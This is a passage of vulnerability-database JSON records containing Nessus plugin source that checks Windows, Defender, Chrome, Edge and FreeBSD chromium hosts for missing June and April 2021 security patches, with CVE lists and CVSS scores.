or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003637'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'19041',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003637])\n\n|| smb_check_rollup(os:'10', \n sp:0,\n os_build:'19042',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003637])\n\n|| smb_check_rollup(os:'10', \n sp:0,\n os_build:'19043',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003637])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T14:28:25", "description": "The remote Windows host is missing security update 5003695. 
It is, therefore, affected by multiple vulnerabilities", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003695: Windows Server 2008 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31962", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003695.NASL", "href": "https://www.tenable.com/plugins/nessus/150357", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150357);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31962\",\n \"CVE-2021-31971\",\n \"CVE-2021-31973\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003661\");\n script_xref(name:\"MSKB\", value:\"5003695\");\n script_xref(name:\"MSFT\", value:\"MS21-5003661\");\n script_xref(name:\"MSFT\", value:\"MS21-5003695\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003695: Windows Server 2008 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003695. 
It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003695\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003661\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003695\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"fep_installed.nasl\");\n script_require_keys(\"installed_sw/Forefront Endpoint Protection\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp = 'Forefront Endpoint Protection';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\n# Check if we got the Malware Engine Version\nif (isnull(app_info['engine_version']))\n exit(0,'Unable to get the Malware Engine Version.');\n\nconstraints = [{'fixed_version':'1.1.18200.3'}];\n\nvcf::av_checks::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, check:'engine_version');\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T14:33:03", "description": "The Malware Protection Engine version of Microsoft Windows Defender installed on the remote Windows host is equal or prior to 1.1.17800.5. It is, therefore, affected by multiple vulnerabilities. \n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-31985) \n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. 
(CVE-2021-31978)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "Security Update for Windows Defender (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31978", "CVE-2021-31985"], "modified": "2021-08-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:windows_defender"], "id": "SMB_NT_MS21_JUNE_WIN_DEFENDER.NASL", "href": "https://www.tenable.com/plugins/nessus/150359", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150359);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/12\");\n\n script_cve_id(\"CVE-2021-31978\", \"CVE-2021-31985\");\n script_xref(name:\"IAVA\", value:\"2021-A-0273-S\");\n\n script_name(english:\"Security Update for Windows Defender (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An antimalware application installed on the remote host is affected by multiple 
vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Malware Protection Engine version of Microsoft Windows Defender installed on the remote Windows host\nis equal or prior to 1.1.17800.5. It is, therefore, affected by multiple vulnerabilities. \n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-31985)\n \n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected \n component to deny system or application services. (CVE-2021-31978)\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31985\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?db0f474f\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31978\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51ebd435\");\n script_set_attribute(attribute:\"solution\", value:\n\"Enable automatic updates to update the malware engine for the relevant antimalware applications. 
Refer to Knowledge Base\nArticle 2510781 for information on how to verify that MMPE has been updated.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31985\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:windows_defender\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_windows_defender_win_installed.nbin\");\n script_require_keys(\"installed_sw/Windows Defender\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp = 'Windows Defender';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\n# Check if disabled\nif (!isnull(app_info['Disabled']))\n exit(0,'Windows Defender is disabled.');\n\n# Check if we got the Malware Engine Version\nif (isnull(app_info['Engine Version']))\n exit(0,'Unable to get the Malware Engine Version.');\n\nconstraints = [{'fixed_version':'1.1.18200.3'}];\n\nvcf::av_checks::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, check:'Engine Version');\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:28", "description": "The version of Google Chrome installed on the remote macOS host is prior to 90.0.4430.85. It is, therefore, affected by multiple vulnerabilities as referenced in the 2021_04_stable-channel-update-for-desktop_20 advisory. 
Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-04-20T00:00:00", "type": "nessus", "title": "Google Chrome < 90.0.4430.85 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_90_0_4430_85.NASL", "href": "https://www.tenable.com/plugins/nessus/148849", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148849);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-21222\",\n \"CVE-2021-21223\",\n \"CVE-2021-21224\",\n \"CVE-2021-21225\",\n \"CVE-2021-21226\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0187-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n 
script_name(english:\"Google Chrome < 90.0.4430.85 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 90.0.4430.85. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2021_04_stable-channel-update-for-desktop_20 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?70d7f7db\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1194046\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1195308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1195777\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1195977\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1197904\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 90.0.4430.85 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21226\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'90.0.4430.85', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:37", "description": "Chrome Reelases reports :\n\nThis release includes 7 security fixes, including :\n\n- 1194046] High CVE-2021-21222: Heap buffer overflow in V8. Reported by Guang Gong of Alpha Lab, Qihoo 360 on 2021-03-30\n\n- [1195308] High CVE-2021-21223: Integer overflow in Mojo. Reported by Guang Gong of Alpha Lab, Qihoo 360 on 2021-04-02\n\n- [1195777] High CVE-2021-21224: Type Confusion in V8. Reported by Jose Martinez (tr0y4) from VerSprite Inc. 
on 2021-04-05\n\n- [1195977] High CVE-2021-21225: Out of bounds memory access in V8.\nReported by Brendon Tiszka (@btiszka) supporting the EFF on 2021-04-05\n\n- [1197904] High CVE-2021-21226: Use after free in navigation.\nReported by Brendon Tiszka (@btiszka) supporting the EFF on 2021-04-11", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-04-22T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (cb13a765-a277-11eb-97a0-e09467587c17)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_CB13A765A27711EB97A0E09467587C17.NASL", "href": "https://www.tenable.com/plugins/nessus/148931", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source 
(VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(148931);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2021-21222\", \"CVE-2021-21223\", \"CVE-2021-21224\", \"CVE-2021-21225\", \"CVE-2021-21226\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (cb13a765-a277-11eb-97a0-e09467587c17)\");\n 
script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Chrome Reelases reports :\n\nThis release includes 7 security fixes, including :\n\n- 1194046] High CVE-2021-21222: Heap buffer overflow in V8. Reported\nby Guang Gong of Alpha Lab, Qihoo 360 on 2021-03-30\n\n- [1195308] High CVE-2021-21223: Integer overflow in Mojo. Reported by\nGuang Gong of Alpha Lab, Qihoo 360 on 2021-04-02\n\n- [1195777] High CVE-2021-21224: Type Confusion in V8. Reported by\nJose Martinez (tr0y4) from VerSprite Inc. on 2021-04-05\n\n- [1195977] High CVE-2021-21225: Out of bounds memory access in V8.\nReported by Brendon Tiszka (@btiszka) supporting the EFF on 2021-04-05\n\n- [1197904] High CVE-2021-21226: Use after free in navigation.\nReported by Brendon Tiszka (@btiszka) supporting the EFF on 2021-04-11\"\n );\n # https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?70d7f7db\"\n );\n # https://vuxml.freebsd.org/freebsd/cb13a765-a277-11eb-97a0-e09467587c17.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?be54099d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21226\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<90.0.4430.85\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:48", "description": "The version of Microsoft Edge installed on the remote Windows host is prior to 90.0.818.46. It is, therefore, affected by multiple vulnerabilities as referenced in the April 22, 2021 advisory. 
Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-04-22T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 90.0.818.46 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_90_0_818_46.NASL", "href": "https://www.tenable.com/plugins/nessus/148939", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148939);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-21222\",\n \"CVE-2021-21223\",\n \"CVE-2021-21224\",\n \"CVE-2021-21225\",\n \"CVE-2021-21226\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 
